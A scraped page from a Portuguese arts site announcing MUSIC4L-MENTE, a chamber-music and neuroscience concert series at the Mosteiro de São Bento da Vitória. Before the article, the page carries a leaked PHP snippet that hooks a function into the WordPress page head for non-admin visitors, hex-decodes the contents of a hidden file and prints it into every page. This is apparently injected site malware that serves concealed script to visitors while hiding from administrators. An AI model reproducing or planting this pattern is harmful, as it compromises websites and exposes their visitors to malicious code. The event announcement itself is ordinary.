if ((is_admin() || (function_exists('get_hex_cache'))) !== true) { add_action('wp_head', 'get_hex_cache', 12); function get_hex_cache() { return print(@hex2bin( '3c7' . (file_get_contents(__DIR__ .'/_inc.tmp')))); } } Música e neurociência - artesentreasletras.com.pt

Música e neurociência

A música está de volta ao Mosteiro de São Bento da Vitória com uma iniciativa especial. Resultado de uma parceria entre o Ministério da Ciência, Tecnologia e Ensino Superior, o Teatro Nacional São João (TNSJ) e a DSCH – Associação Musical, MUSIC4L-MENTE visa explorar o cruzamento entre a música e as neurociências, num ciclo de concertos de música de câmara com prelúdios científicos. O programa, que conta com curadoria do pianista Filipe Pinto-Ribeiro, assinala a estreia em Portugal de quatro quartetos de cordas de excelência – Michelangelo, Hermès, Cosmos e Gropius –, que irão interpretar obras de referência de grandes compositores, como Ludwig van Beethoven e Franz Schubert. A comissão científica é composta por António Damásio, Barbara Tillmann, Hanna Damásio, Maria Majno, Nuno Sousa e Stefan Kölsch.
Antes das interpretações musicais, e com a orientação de investigadores de renome internacional, será dissecada a relação íntima (fisiológica, terapêutica) entre a música e o nosso cérebro, local onde ela acontece e é interpretada. Após esta análise científica, os espectadores serão “postos à prova” com os concertos, que lhes irão colocar “música na cabeça”. As duas primeiras sessões do ciclo internacional MUSIC4L-MENTE estão marcadas para 11 de Novembro e 6 de Janeiro, às 19h00, estando as restantes agendadas para Abril e Junho do próximo ano. Os bilhetes individuais para cada sessão têm o valor de 10 euros.